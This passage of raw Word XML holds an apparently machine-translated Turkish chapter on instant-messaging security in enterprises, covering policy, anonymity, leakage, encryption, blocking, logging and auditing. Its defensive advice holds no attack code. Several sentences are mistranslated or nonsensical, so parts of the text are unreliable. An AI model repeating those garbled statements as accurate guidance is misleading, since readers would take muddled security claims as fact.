          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yiyeceği gerçeğinden yararlanmaktadır. Her sherman bilir ki ısırmazsa yemi değiştirir. Hala ısırmazlarsa, yeni bir noktaya geçin. IM, çok fazla with sh olan büyük bir alan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iğ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Tüm güvenlik açıkları listesinin “diğer” ile bitmesi gerekir. Geniş güvenlik açıkları kategorilerini belirleme konusunda iyi olduğumuza rağmen, hiçbir insan grubunun kullanıcıların tüm aptalca şeylerini tanımlaması olası değildi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orun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u bölümde, IM'yi çevreleyen güvenlikle ilgili bazı konular tartışılmakta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Politika ve Farkındalı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M kullanımından kaynaklanan çoğu hasar aksi takdirde iyi niyetli kullanıcılar tarafından yanlışlıkla yapılacaktır. Çoğu teknolojide olduğu gibi, problemler gerçekten insanların problemleridir. Yönetimin kullanıcı davranışına dayanması gerekiyorsa, bu davranışı kullanıcılara açıklaması esastır. Yönetim, sevdiği neredeyse tüm politikaları belirleyebilir ancak sessiz olmayabilir. Yararlı bir kural, güvenlik politikasının tüm iletişim ortamlarına tutarlı davranması gerektiğidir. Kullanıcılar bir mesaj için en etkili ortamı seçebilmelidir. Basit bir şekilde, keyfi kuralları, güvenliği veya başka bir şeyi yerine getirmek için yetersiz bir ortam seçmeye zorlanmamalıdır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Anlık Mesajlaşma Güvenliği Sorunları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve Çözümle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Ef eksikl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Yönetim, IM'in gerçekten verimsizliği ve kullanıcıları işten uzaklaştırma potansiyelini telafi etmek için verimliliği artırıp artırmadığını sorguluyor. Yönetimin artık telefonun en müdahaleci teknolojisi hakkında aynı soruyu sormaması artık öğreticidir. Her durumda, yönetimin çok fazla seçeneği varmış gibi değil. IM kullanımı için büyüme paterni iyi bir şekilde oluşturulmuştur ve tersine çevrilmesi veya hatta dengelenmesi beklenmemektedir. Yönetim en iyisine alışmıştı; işçiler olacak. İşçiler, telefon, bilgisayar ve e-postaları olduğu için IM'yi çalışma stillerine entegre edeceklerdir. Dikkat dağıtıcı olarak görülmeyecek, çalışma alanının bir parçası olarak görülecektir. 1950’lerin başlarında işe girdiğimde masalar varsayılan olarak bir telefonla gelmedi. Dizinde sadece birinin adı olmalı. “Açık” diyorum, çünkü genellikle bir ya da iki sayfa uzunluğundaydı. Doğrudan içeri arama yapılmamıştı (DID); gelen tüm çağrılar operatörden geçti. Bazı iş telefonlarında arama bile yoktu; operatör giden aramaları tamamladı. Ücretli telefon hizmeti dünyasında, artık müşterilerimden iş aramalarının maliyetini geri almaya çalışmıyoru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işisel kullanı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Tüm iletişimler için önemli bir politika konusu kişisel kullanım konusudur. İşletmenin kaynaklarını korumak için yönetimin temel bir sorumluluğu vardır. Kullanıcılara, kurumsal kaynakların nasıl tüketilebileceği konusunda talimat vermelidir. Kişisel kullanım ile ilgili olarak, IM telefon veya posta odası ile aynı şekilde ele alınmalıdır. Yönetim, telefonun kişisel kullanımına izin veriyorsa, benzer kurallar altında IM'in kişisel kullanımına izin vermelidir. 20 yıl kadar önce, işverenim bana atanan telefondan yapılan tüm aramaların ayrıntılı bir </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>muhasebesini gönderdi. “Kişisel” olanları tanımlamam ve bu çağrıları karşılamak için kasiyere bir çek yazmam bekleniyordu. Hatırlamak için çok genç olanlarınız “Ne kadar ilginç” diyeceklerdir. O zaman bile, “kişisel” çağrıların maliyeti, harcadığım zamanın değeri ile karşılaştırıldığında önemsizdi. Bu 20 yılda, telefon görüşmelerinin maliyeti düştüğü için, kişisel kullanım için toplam muhasebe maliyeti, elde edilebilecek harcamalardaki azalmayı aşmaya başladı ve bunu durdurduk. Artık işçiler cep telefonlarını işe koyuyor ve üzerlerinde kişisel görüşmeler yapıyor ve alıyor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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noniml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aha önce belirttiğimiz gibi, takma adların ve "tutamaçların" kullanımı IM'de varsayılandır. Bu tutamaçların adı, rolü veya (e-posta) adresiyle ilgili olabilir, ancak genellikle kullanıcının yansıtmak istediği bir kişiyle ilgilidir. Bazı kullanıcılar çok var. Dizin girişleri de bu görüntüyü bilgilendirmek için yansıtmak için kullanılır. Hizmete veya ortama bağlı olarak, tanıtıcı kullanıcının kimliğine bağlı olabilir veya olmayabilir. Örneğin, AOL IM kullanıcılarının mesaj hedefleri olarak bir isim belirtmeleri gerekir. Bununla birlikte, AIM, kullanıcının birden fazla isteğe bağlı ad belirtmesini sağlar. Ancak, bir kez kaydolduktan sonra bir isim kullanıcıya aittir. Onu terk edebilir; ama bunu yapana kadar ve o olmadıkça, onun. IRC, yalnızca bir bağlantının ömrü boyunca takma ad ayır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Pr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>örünürlü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nonimliğin diğer tarafı görünürlük - yani, IM sisteminin birisini diğer kullanıcılar tarafından nasıl tanıttığıdır. Sizi tamamen gizleyen bir sistem hiç faydalı olmayabilir. Ancak, birini çok görünür kılan, konunun düşündüğünden daha fazla bilgi sızdırması olabilir. Eğer A B'ye bir mesaj gönderirse, A B'nin çevrimiçi / çevrimiçi olmadığını belirten bir mesaj alabilir. Eğer A ve B birbirlerinin irtibat listesinde ise, her birinin diğerinin durumu (çevrimiçi / ine, aktif / pasif, ev / uzakta) hakkında bilgi bulunabilir. Birçok sunucu, kullanıcı sunucuya kaydolduğunda, kullanıcının kişi listesindeki herkes hakkında bilgi verecektir. Weemanjr AIM'ye bağlanıp oturum açtığında, müşterimde adının yanındaki simge yanar. İmlecimi simgesinin üzerine geçirirsem, bağlantısının durumu hakkında, örneğin çevrimiçi olup olmadığı, ne kadar süredir çevrimiçi olduğu veya en son ne zaman görüldüğü; AOL çevirmeli ağ istemcisi veya İnternet üzerinden bağlı olup olmadığı ve müşterisinin yetenekle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ilgi Güvenliği Yönetimi El Kitab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vardır. Tabii ki kimliğini bilmeliyim, Weemanjr. IM adının e-posta adresiyle veya AOL ekran adıyla aynı olduğunu varsayabilirim, ancak hatalı olurdum. Ancak, biri benim hakkımda bu varsayımı yaptıysa, biri doğru olacakt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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hlal</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En iyi durumda ve zaman zaman anlık iletiler izinsiz girer. Spam kadar müdahaleci olmasalar ve telefondan kesinlikle daha az müdahaleci olmalarına rağmen, yine de müdahalecidirler. Çoğu istemci uygulaması, kullanıcının belirli kullanıcılardan gelen trafiği reddetmesine izin vermek için kontroller sağlar; izin verici politika. Gerçekten, belirli kullanıcılar dışındaki tüm trafiğin reddedilmesine izin veriyorlar: kısıtlayıcı politika. Her iki durumda da, kullanıcının politikayı seçmesi ve yönetmesi için bir miktar işlem yapılması gerek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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aça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Girişimcinin IM'nin güvenliği konusunda endişelendiği ölçüde, genellikle gizli bilgilerin sızması ile ilgilidir. IM birçok yönden bilgi sızdırabilir. Kullanıcı, yanlışlıkla ya da öfke ya da </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>spite gibi motiflerden bilgi sızdırabilir. Bilgi aktarımda sızıntı olabilir. Ayrıcalıklı sunucu kullanıcılarına veya tehlike altındaki sunuculardan sızıntı yapabilir. Dizinler veya kayıt defterleri aracılığıyla sızıntı yapabilir. Kişi listelerinin yerel olarak veya sunucuda saklanabileceğini unutmayın. Sunucuların bir dereceye kadar güvenilmesine ihtiyaç duyulmasına rağmen, orada saklanan bilgiler sızıntıya açıktır. Bir sunucuda bu bilgilerin toplanması, müşteri tarafında depolanan ayrı kayıtlardan daha çekici bir hedeftir. Kurumsal IM sistemleri, bazı trafiğe günlükleri kaydeder. Bu günlükler hedef haline gelir ve bilgi sızıntısı ola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ablosu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iderek, IM kablosuz içerir. İnternet özellikli cep telefonlarının çoğu, genellikle AOL IM veya Yahoo! AOL ve Yahoo! Palm OS ve Windows Pocket PC cihazları için istemciler. Bu cihazlara trafik aktarma mekanizması tarafından kısmen gizlenmiş olsa da, bu cihazlar henüz uçtan uca şifrelemeyi desteklememektedir. IM ayrıca dizüstü bilgisayarlara kablosuz LAN teknolojisi (802.11) üzerinden kullanılır. Bu cihazlar hem bağlantı şifrelemeyi (örneğin, SSL) hem de uçtan uca şifrelemeyi destekleyebilir. Kablosuz LAN şifrelemesi, standart (WEP) veya tescilli, birinin kablosuz bağlantıların farkında olduğu yerlerde faydalı veya belirtilmiş olabilir. Ancak asıl mesele, ucuz kablosuz ağın taşıma katmanını güvenilmez hale getirmesidir. Bu, uçtan uca şifreleme kullanılarak telafi edilmeli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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olaysızlı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M “gönder” tuşuna basıldığında, olabilecek herhangi bir hasar çoktan yapıldı. Ne kullanıcı ne de yönetim ikinci bir şans alır. Gönderme tuşu, dönüş veya yeni hat tuşuyla aynıysa, erken veya yanlışlıkla yapılan göndermelerle sonuçlanabilir. Bazı anlık mesajlaşma uygulamaları birisinin müşteri tercihlerini belirleyebilmesine izin verir, böylece bir mesaj göndermenin güçlü bir niyet gerektirmesi gerek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Geç bağlama  Görüldüğü gibi IM geç programlanabilirlik için ayrı bir tercih ortaya koyuyor; yani, istemci uygulama programının işlevini değiştirmek kolay olabilir. Ne de olsa, IM'nin çoğu “programcılar için programcılar tarafından oluşturuldu”. Bunun bir anlamı, bu tekliflerin tutarlı davranışına güvenmenin zor olduğudur.   dolandırıcılık  Anonimlik veya hatta onsuz, IM her türlü aldatmaca ve sahtekarlığı gerçekleştirmek için kullanılır. Kullanıcılar, özellikle güvenilir kaynaklardan geliyor gibi görünüyorsa, ekranlarında açılan mesajlara inanma eğilimindedir. Örneğin, bir mesaj, alıcının bir parola girmesini, bir komut girmesini veya bir simgeyi veya bağlantıyı tıklatmasını önerebilir. Bu, alıcının kimliği ve imtiyazları ile bu işlemi başlatmanın bir yoludur.   AU1997_Frame_Ch050 Sayfa 610 17 Kasım 2003 Pazartesi 13:20 © 2004, CRC Press LLC tarafından   Anlık Mesajlaşma Güvenliği Sorunları   611   Güven  Genel bir kural olarak, IM kullanıcıları, birbirlerini içerik olarak tanıma yeteneklerine güvenirler; çevreye güvenmiyorlar ve güven de bir sorun değil. Ancak, gelecekte, nüfuslar daha büyük olacak ve güvenilir dizinler ve kayıtlar için gereklilik de daha yüksek olacakt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özeti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Yönetim, sürveyansı genel olarak iletişim kullanımını ve özellikle de IM kullanımını kontrol etmek için bir kontrol olarak kullanabilir. Bazı durumlarda öyle yapmalı. Bununla birlikte, herhangi bir iletişim ortamının sürveyansı yaygın veya hatta rutin hale gelirse, kullanımı devam eder ve değerini azaltır. Yönetimin iletişim içeriğine olan ilgisi, çalışanın makul mahremiyet hakkına karşı dengelenmelidir. IM, spontanlık açısından ve bıraktığı kaydın değeri ve kalıcılığı açısından telefon ve e-posta arasında bir yerdir. Benzer şekilde, IM'nin </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>otomatik denetlemesinin maliyeti ve faydası, telefonun ve e-postanın da arasındadır. Sesli telefonun otomatik olarak izlenmesini sağlayanlar kesinlikle IM'in izlenmesini de otomatikleştirmek isteyeceklerdir. Bununla birlikte, e-posta denetlemesini otomatik olarak almayanlar kesinlikle IM'nin denetlenmesini otomatikleştirmek istemeyeceklerdir. Herhangi bir iletişim gözetimi kaydı, açıklamaya, orijinal iletişimin kendisinden daha hassastır. Bir saldırı hedefi ve “süren keşif gezileri” haline geldi. İyi uygulama, böyle bir kaydın erken kullanılmasını ve sonra imha edilmesini öner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aldırgan İçer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En azından kenarlarda, İnternet de dahil olmak üzere toplum çirkinlik içeriyor. IM buna bir istisna değildir. Bu, kısmen IM'nin çocukların sevdiği bir uygulama olması ve çocuklar için en sevdiği uygulamanın sosyalleşmesi nedeniyle sıkıntılı bir durumdur. Çocuklar aynı zamanda diğer yerlerde tatmin etmekten çekindikleri (cinsel) merakı tatmin etmek için IM'yi kullanırlar. Yüksek sesle ve yüz yüze söylemekten alıkoydukları şeyleri söyleme pratiğini yapmak için kullanırlar. Rutin gizlenme veya kullanıcı kimliğinin yanlış beyanı (örneğin, yaş, cinsiyet, görünüm, sınıf, rol) ile birleştiğinde, sonuç çocukların çirkinliğe ve hatta baştan çıkarmaya maruz kalabileceğidir. İnternetin baştan çıkarma konusunda evden, okuldan, kiliseden, alışveriş merkezinden veya oyun alanından daha güvenli olabileceği ancak bu durum özellikle mümkün olduğunda küçük bir rahatlık olabileceği anlamına gelebilir. İşletmelerdeki benzer davranışlar veya içerikler, işletmelerin daha uyumlu bir çalışma ortamı sağlama sorumluluğunu tehlikeye atabilir. Bir başka şekilde, işletme, çalışanlarını çirkinlikten korumaktan sorumlu olsalar bile, sorumlu tutula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isipli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M alanı çok hoşgörülüdür ancak kibar davranış standartlarına sahiptir. Diğer sosyal popülasyonlarda olduğu gibi, bu standartları ihlal etmek için yaptırımlar var. Herhangi bir kaba davranışta olduğu gibi, ilk yaptırım toplum tarafından da ön plana çıkmaktadır. Kaba bir şekilde davrananlar kendilerini dışa vurdular, yani dışlanmışlardı. Servis sağlayıcı daha sert yaptırımlar uygulayabilir. Örneğin, AOL hizmet şartlarını şiddetle uygulamaktadır. Littleone “ICQ sohbet odasındaydı”. AOL hizmet şartlarını ihlal eden bir dil kullandı. Bu, littleone'nin IM tarafından sağlanan anonimlik pelerini olmadan kullanmamış olması muhtemel bir dildi. Littleone, annesinin ondan veya başka birinden duymasını istemediği bir dildi. Hesap sahibi olan annesi, AOL destek temsilcilerinden bir çağrı aldıktan sonra ona dili hatırlattı. Destek temsilcileri, onun hareketlerini biraz çözemezse hesabını iptal edeceğini söyledi. Biri IRC'den tamamen yasaklanamazken, kanal sahipleri IP adreslerine göre kaba kullanıcıları engelleyebilir ve engelleyebilir. Davranış standartlarını zorlamak için tüm alanları dışlamaları ya da aralıkları ele almaları bilinmektedir. Girişim yönetimi çok fazla güç ve disiplin kullanıyor. IM işyerinin bir parçasıdır ve orada olanlardan yönetim sorumlu ve sorumludur. Bazı kullanıcı IM davranışlarından yönetim sorumlu tutulabildiğinden, bazı kontroller uygulamalıdır. En azından, yönetim işçilere söylemeli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ilgi Güvenliği Yönetimi El Kitab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Hangi kullanım uygun, hangisi uygun değil. Diğer güvenlik ihlallerinde olduğu gibi, yönetim disiplin cezalarını da kullanabilir - kınamadan sona erdirmeye kad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ontrol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eklediğiniz gibi IM, kullanıcılarını ve trafiğini korumak için kullanılabilecek kontroller ile birlikte gelir. Kullanıcı, ebeveynler ve veliler veya yöneticiler bu özellikleri riski yönetmek için kullanabilir. Bununla birlikte, IM'in doğal olarak yüksek riskli olduğunu ve bu kontrollerin ihtiyatlı bir şekilde uygulanmasında bile genellikle böyle kalacağını unutmayı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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayıt</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çok IM sistemi, kullanıcının benzersiz bir kamu kimliğini kaydetmesini gerektirir. Diğer kullanıcılar bu tanımlayıcıyı kendisine mesaj göndermek için kullanacaktır. Servis bu mesajı mesajların gönderileceği ağ adresini bulmak için kullanacaktır. Aynı zamanda, kullanıcının servisle sır değiştirmesi gerekebilir. Bu parola, hizmetin yalnızca gönderen tarafından amaçlanan tarafa mesaj göndermesini sağlamak için kullanıcının kimliğini doğrulamak için kullanılacaktır. Bazı sistemler, halihazırda kullanıcısı olanlardan sadece bir tane kayıt kabul edecek olsa da, çoğu kişi hemen hemen herkesin keyfi bir numarasına izin verecekt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izin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ervisler bir kullanıcı dizini ve adreslerini tutabilir. Kullanıcılar bu dizini, mesaj göndermek istediklerinin kimliğini bulmak için kullanabilir. Birçok kamu sisteminde, dizindeki bilgiler kullanıcı tarafından sağlanır ve güvenilir değildir. Bazı servis sağlayıcılar, bir kullanıcı kimliği ile örneğin gerçek bir isim ve adres arasındaki ilişkiyi geliştirmek için hesap ve fatura bilgilerini kullanabilir. Örneğin, AOL kullanıcılarının bir dizini tutar. Bu dizine erişim, AOL aboneleri tarafından kullanılabilir. AOL, abonelerin kendi dizin girişlerine erişimi sınırlamalarına izin verir. Özel sistemlerde, yönetim dizinin sahibine sahip olabilir ve tüm kullanıcıların yetkilendirilmiş, doğru adlandırılmış ve dizindeki tüm tanımlayıcı bilgilerin (örneğin bölüm, işlev veya rol) güvenilir olmasını sağlaya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 xml:space="preserve">Kimlik ve Kimlik Doğrulama  Çoğu IM uygulaması, gönderenleri ve alıcıları tanımlamak ve doğrulamak için kullanılabilecek kontroller sağlar. Çoğu, hem tanımlayıcı hem de parolanın kimliğin hem açık hem de taklit edilmesinin zorlaştırılmasında yeterli uzunlukta olmasına izin verir. Bununla birlikte, çoğu güvenlik üzerinden bağlantı için bir tercih uygulamaktadır; yani, başlarlar, bağlanırlar ve hatta otomatik olarak oturum açarlar. Bu, değerin bağlantıların sayısı ve sürekliliği ile arttığını kabul eder. Parolanın veya parolanın yerel olarak depolanmasını gerektirir. Bağlanabilirliğin değeri çok yüksek olduğundan, bağlantı zaman aşımına uğramaz. Böylece, makine uygun şekilde başlatıldığında, bağlantılar ve kimlik, makineye erişimi olan herkes tarafından kullanılabilir. Parolayı öğrenmek yeterli olmayabilir, ancak bir süre kullanmak yeterli olabilir. Elbette, sistemi çalışan bir durumda fiziksel erişimi olan bir kişiden korumak çok zordur, bu yüzden bu bir I&amp;A sistemi kadar fiziksel bir güvenlik sorunudur. Bu nedenle, şifreler, masaüstünün denetlenmesini veya bağlantıyı sürdürürken ekran ve klavyenin zaman aşımına uğramasını gerektirmek pahasına sunucuya saldırmaya karşı direnç gösterir (Windows NT veya 2000'de olduğu gibi). Öte yandan, şifrelerin saklanması ve otomatik olarak girilmesi, hataların ve yeniden deneme işlemlerinin uzunluğa (hızla) yükselmediği anlamına gelir. Uzun isimler, kimliği daha patentli kılar ve adresleme hatalarını azaltır. Uzun parolalar ayrıntılı ve tahmin edici saldırılara karşı koyar. Parolalar IM programları tarafından desteklenen tek kimlik doğrulayıcılar olsa da, bunlar istemci makinede kullanılan güçlü kimlik doğrulama yöntemleriyle tamamlanabilir. Örneğin, eğer BIOS ve OS şifreleri kullanılıyorsa, bunlar saklanan IM şifresini korurlar.   Tercihler  İstemci uygulamaları, kullanıcının tercihleri ​​belirtmesini sağlar. Bunların çoğu güvenlikle ilgilidir. Kullanıcı, sistem </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>başlangıcında, müşteri başlangıcında, bağlandığında ve bir mesaj alındığında ne olacağını belirleyebilir. İçin   AU1997_Frame_Ch050 Sayfa 612 17 Kasım 2003 Pazartesi 13:20 © 2004, CRC Press LLC tarafından   Anlık Mesajlaşma Güvenliği Sorunları   613   Örneğin, kullanıcı sistem başlangıcında istemciyi başlatabilir, uygulama başında bağlanıp oturum açabilir, kişi listesini ve uygulama başlangıcında kişi durumunu yükleyebilir ve ardından “uzakta” ​​durumunu ve varsayılan uzak mesajı ayarlayabilir. Kullanıcı alarm olaylarını, sesleri ve eylemleri ayarlayabilir. Günlüğe kaydedilecek olayları ve mesajları, günlüğün nereye kaydedileceğini ve onu görüntülemek için hangi programı kullanacağını belirtebilir (ör. Notepad, Excel). Kullanıcı alınan dosyaları saklamak için varsayılan dizini belirleyebilir. Simgeleri otomatik olarak kabul edip etmeyeceğini, hiçbir zaman kabul etmeyeceğini veya kullanıcıya sorabileceğini belirt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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>loke et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ohbet uygulamaları, varsayılan olarak ve belirli kullanıcılardan gelen tüm kullanıcılardan gelen mesajları engelleme olanağı sağlar. Engelleme, izinsiz giriş, taciz veya rahatsız edici içerik riskini azaltır. İstemcide engelleme gönderenin adına dayanır. Alıcıyı izinsiz giriş, çirkinlik ve istenmeyen postalardan korumak için kullanılır. Varsayılan olarak, alıcının irtibat listesinde olmayan bir göndericiden gelen bir mesaj engellenebilir; kullanıcıdan mesajı alıp göndereni irtibat listesine eklemek isteyip istemediği sorulacaktır. Engelleme, işletme çevresinde veya sunucuda da yapılabilir. Burada gönderen adına veya alıcı adına bağlı olabilir. Gönderenin adı engelleme yukarıdaki gibi çalışır. Alıcı adına engelleme, alıcıyı gönderenin adının randomize edildiği hizmet reddi saldırısından korumak için giriş kontrolü olarak kullanılabilir. Bir ağ veya bir kullanıcı popülasyonu üzerinden merkezi blokaj yönetimi için ürünler mevcuttu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oğrudan bağlant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azı istemci uygulamaları, kullanıcıların doğrudan birbirine bağlanmasını sağlar; böylece trafik sunucudan geçmez ve o sunucunun ayrıcalıklı kullanıcıları tarafından görüleme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Şifrele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enzer şekilde, bazı kurumsal IM istemci uygulamaları kullanıcıların iletişimlerini şifrelemelerini sağlar. Birçok IM uygulaması (tek yönlü) SSL kullanıcıdan sunucuya ve sunucudan kullanıcıya kullanarak şifreler. Bu uygulama, mesajın A’nın anahtarından şifresini çözmesini ve B’nin altında sunucuda tekrar şifrelenmesini gerektirir. Bu, mesaj içeriğini sızdırmamak için sunucunun güvenilir olması gerektiği anlamına gelir. IM sunucusu her durumda bir dereceye kadar güvenilirdir; İşletme içerisinde oldukça güvenilir olabilir. Bu sistemin avantajı, emsalsiz istemciler arasında bilgilerin çoğundan çoğa şifrelenebilmesidir. Tek şart, tüm istemcilerin SSL'yi desteklemesidir. Birkaç ürün trafiğin uçtan uca şifrelenmesini ancak sadece akran sistemlerine izin vermektedir. Örneğin, Trillian Professional müşterileri doğrudan iletişim kurabilir ve oturumlarını baştan sona şifreleyebilir. Bu, kullanıcıların kısmında fazladan bir seçim ve biraz daha fazla kurulum süresi gerektirse de, sistemler arasında sızıntı riskini azaltır. Lotus Sametime Connect, kurum içindeki AIM sunucusunda kayıtlı diğer kullanıcılara şifrelenmemiş oturumlara izin verirken, kurum içindeki iki veya daha fazla kullanıcı arasında otomatik olarak uçtan uca IM oturumları oluşturmak için Lotus Notes PKI'sini kullan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ünlüğü</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lastRenderedPageBreak/>
        <w:t> Enterprise IM istemcileri ve hizmetleri, sunucuda yapılan ve kullanıcının kontrolünde olmayan günlükleri içeren günlük oluşturma yetenekleri sunar. Bu, trafiğin bilgi sızıntısı, dolandırıcılık, taciz veya diğer yasaklanmış faaliyetler için kanıtlanmasına izin verir (örneğin, borsacılar tarafından talep edilmesi, sağlık hizmetlerinin yasaklanması amacıyla sipariş verilmesi). Telefon trafiğini benzer şekilde kaydetmek mümkün olsa da, bu kayıtları denetlemenin maliyeti yasak olacaktır. İşletmeler bunu anladıkça, IM sadece bu tür bir iletişim için izin verilen bir araç değil, aynı zamanda tercih edilen bir araç haline gelir. İşletme yönetimi, log değerinin zamanla hızlı bir şekilde azaldığını ancak sıkıntı değerlerinin arttığını unutmamalıdır. Doğru şeyi yapmayı sağlamadaki değerleri, doğru şeyi yapmadığınızı gösterme potansiyeli arttıkça azalır. Günlükler hassas bilgiler içerebilir ve hedef olabilir. Kullanımları üzerinde erişim kontrolleri faydalı olmalarını sağlamak için gereklidir ancak bilgi sızdırma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Raporla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urumsal IM ürünleri, hem IM kullanımını hem de mesaj trafiği içeriğini bildirir. Doğru şekilde ayrıcalıklı kullanıcılar ve yöneticiler yalnızca trafiğin içeriğini görmekle kalmaz, aynı zamanda dizinde ve kayıt sunucularında gönderen ve alıcıyla ilgili açıklayıcı bilgilere geri dönebilir. Bazı ürünler bu bilgilerin zayıf bir istemci (Web tarayıcısı) ile görüntülenmesine izin ver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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enetle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enetim, amaçlanan ve beklenenlere olanların uzlaşması olarak görülebilir. Ayrıca, içeriğini anlamak için kayıtların gözden geçirilmesi olarak da görülebilir. Yöneticinin veya denetçinin, politika içeriğini ve problemin düzeltilmesini yönlendirmek için günlük içeriğini bilgiye dönüştürmesine yardımcı olmak için kullanabileceği veri azaltma, analiz ve görselleştirme ürünleri vardır. Bu ürünler, türler, elektronik tablolar, veritabanları ve veri madenciliği araçları gibi genel amaçlı araçları içerir. Ayrıca, ne arayacakları, nasıl bulabilecekleri ve ne yapacaklarıyla ilgili özel bilgileri içeren özel araçlar da var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1103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üzme</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assas veya uygunsuz içerik veya virüs imzaları öneren anahtar kelimeler için mesajlar ve diğer veri nesneleri için ürünler kullanılabilir. Bilgi sızıntısına, sistem ve ağ kirliliğine karşı koymak için kullanılabilirler. Etkin kullanım için, bu ürünler hem politikaya (hangi trafiğin yüklenmemesi gerektiğini belirtmek gerekir) hem de yönetim (bu politikayı, kullanıcının kullanabileceği kurallara dönüştürmek için) gerektirir. Mesajına gecikme eklerler ve meşru trafiği engelleyebilecek yanlış pozitifler üretirler. Kural koymada rehberlik etmek için yalnızca politika değil aynı zamanda düzenlemelerin mevcut olduğu sağlık ve finansal hizmetler gibi düzenlenmiş işletmelerde de uygulanabilirler. IM kullanımı arttıkça ve bilgisayarlar daha verimli hale geldikçe, uygulamaların daha etkili ve verimli olmaları beklen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Alarmlar ve Mesajlaşma  IM trafiğini virüs ve hassas içerik bakımından trafiğe sokan ürünler alarm üretecektir. Bu alarmlar, gerekli düzeltici eylemi başlatacak konumda olanlara iletilmelidir. Alarmlara sürekli cevap vermemek, suistimali davet edecek veya teşvik edecekt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n</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erile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lastRenderedPageBreak/>
